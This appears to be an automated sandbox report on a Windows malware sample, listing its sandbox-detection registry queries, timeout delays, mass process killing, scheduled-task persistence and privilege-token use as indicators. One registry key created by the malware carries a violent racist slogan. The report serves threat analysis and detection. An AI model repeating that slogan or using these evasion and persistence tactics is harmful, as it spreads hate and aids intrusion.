Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found

Delays execution with timeout.exe 4 IoCs

pid	Process
3744	timeout.exe
5284	timeout.exe
6732	timeout.exe
13944	Process not Found

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Process not Found

Kills process with taskkill 38 IoCs

pid	Process
4828	taskkill.exe
2056	taskkill.exe
1364	taskkill.exe
4352	taskkill.exe
4716	taskkill.exe
1808	taskkill.exe
3308	taskkill.exe
1204	taskkill.exe
2756	taskkill.exe
1768	taskkill.exe
72	taskkill.exe
1644	taskkill.exe
2740	taskkill.exe
4408	taskkill.exe
2656	taskkill.exe
304	taskkill.exe
5844	taskkill.exe
4516	taskkill.exe
5160	taskkill.exe
4808	taskkill.exe
5180	taskkill.exe
2060	taskkill.exe
5848	taskkill.exe
1472	taskkill.exe
5068	taskkill.exe
4644	taskkill.exe
3228	taskkill.exe
6020	taskkill.exe
1668	taskkill.exe
4980	taskkill.exe
1988	taskkill.exe
3532	taskkill.exe
6128	taskkill.exe
3924	taskkill.exe
5136	taskkill.exe
4004	taskkill.exe
3468	taskkill.exe
1168	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E	Process not Found
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	Process not Found
Key created	\REGISTRY\USER\S-1-5-20\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Software\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	Process not Found
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Software\Software\Rasauq on top\	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-20\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT	reg.exe
Key created	\REGISTRY\USER\S-1-5-19	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	Process not Found
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	Process not Found
Key created	\REGISTRY\USER\S-1-5-20\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	Process not Found
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	Process not Found
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	Process not Found
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software	reg.exe

Modifies registry class 23 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\	reg.exe
Key created	\Registry\User\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
7288	schtasks.exe
7872	schtasks.exe
2428	schtasks.exe
1748	schtasks.exe
5108	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4972	powershell.exe
4972	powershell.exe
4832	powershell.exe
4832	powershell.exe
5292	powershell.exe
5292	powershell.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
692	powershell.exe
692	powershell.exe
5936	powershell.exe
5936	powershell.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
5200	powershell.exe
5200	powershell.exe
2084	powershell.exe
2084	powershell.exe
3768	powershell.exe
3768	powershell.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
4984	powershell.exe
4984	powershell.exe
3320	powershell.exe
3320	powershell.exe
4064	powershell.exe
4064	powershell.exe
5988	powershell.exe
5988	powershell.exe
4492	powershell.exe
4492	powershell.exe
5220	powershell.exe
5220	powershell.exe
4040	powershell.exe
4040	powershell.exe
6124	powershell.exe
6124	powershell.exe
7452	powershell.exe
7452	powershell.exe
7452	powershell.exe
400	Process not Found
400	Process not Found
3204	Process not Found
3204	Process not Found
3204	Process not Found

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
2976	msedge.exe
5288	cmd.exe
4896	cmd.exe
19632	Process not Found

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
22680	Process not Found
22732	Process not Found
2188	Process not Found
2420	Process not Found
2456	Process not Found
3696	Process not Found
2216	Process not Found
22848	Process not Found
22972	Process not Found
22844	Process not Found
22856	Process not Found
22868	Process not Found
22860	Process not Found
6468	Process not Found
23124	Process not Found
22796	Process not Found
23084	Process not Found
22976	Process not Found
15568	Process not Found
1852	Process not Found
22808	Process not Found
23164	Process not Found
23128	Process not Found
23136	Process not Found
23148	Process not Found
23076	Process not Found
22876	Process not Found
23144	Process not Found
23172	Process not Found
23180	Process not Found
23196	Process not Found
23188	Process not Found
23176	Process not Found
23100	Process not Found
23156	Process not Found
23208	Process not Found
23276	Process not Found
23240	Process not Found
23228	Process not Found
23236	Process not Found
23220	Process not Found
23252	Process not Found
23280	Process not Found
23080	Process not Found
23284	Process not Found
23272	Process not Found
23332	Process not Found
23344	Process not Found
23340	Process not Found
23288	Process not Found
23260	Process not Found
23480	Process not Found
23464	Process not Found
23484	Process not Found
23472	Process not Found
23492	Process not Found
23304	Process not Found
23424	Process not Found
500	Process not Found
23444	Process not Found
16644	Process not Found
8864	Process not Found
14320	Process not Found
23528	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5228	Rasauq SoftWorks.exe
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	5292	powershell.exe
Token: SeBackupPrivilege	4768	vssvc.exe
Token: SeRestorePrivilege	4768	vssvc.exe
Token: SeAuditPrivilege	4768	vssvc.exe
Token: SeDebugPrivilege	2080	sRasauq SoftWorks.exe
Token: SeDebugPrivilege	692	powershell.exe
Token: SeDebugPrivilege	5936	powershell.exe
Token: SeDebugPrivilege	5200	powershell.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	5068	taskkill.exe
Token: SeDebugPrivilege	4352	taskkill.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	5228	Rasauq SoftWorks.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	5988	powershell.exe
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeDebugPrivilege	3924	taskkill.exe
Token: SeDebugPrivilege	4644	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	2756	taskkill.exe
Token: SeDebugPrivilege	4716	taskkill.exe
Token: SeDebugPrivilege	5220	powershell.exe
Token: SeDebugPrivilege	5136	taskkill.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	4408	taskkill.exe
Token: SeDebugPrivilege	4828	taskkill.exe
Token: SeDebugPrivilege	6124	powershell.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	304	taskkill.exe
Token: SeDebugPrivilege	4808	taskkill.exe
Token: SeDebugPrivilege	5180	taskkill.exe
Token: SeDebugPrivilege	3532	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	3228	taskkill.exe
Token: SeDebugPrivilege	2056	taskkill.exe
Token: SeDebugPrivilege	3308	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	5844	taskkill.exe
Token: SeDebugPrivilege	4516	taskkill.exe
Token: SeDebugPrivilege	72	taskkill.exe
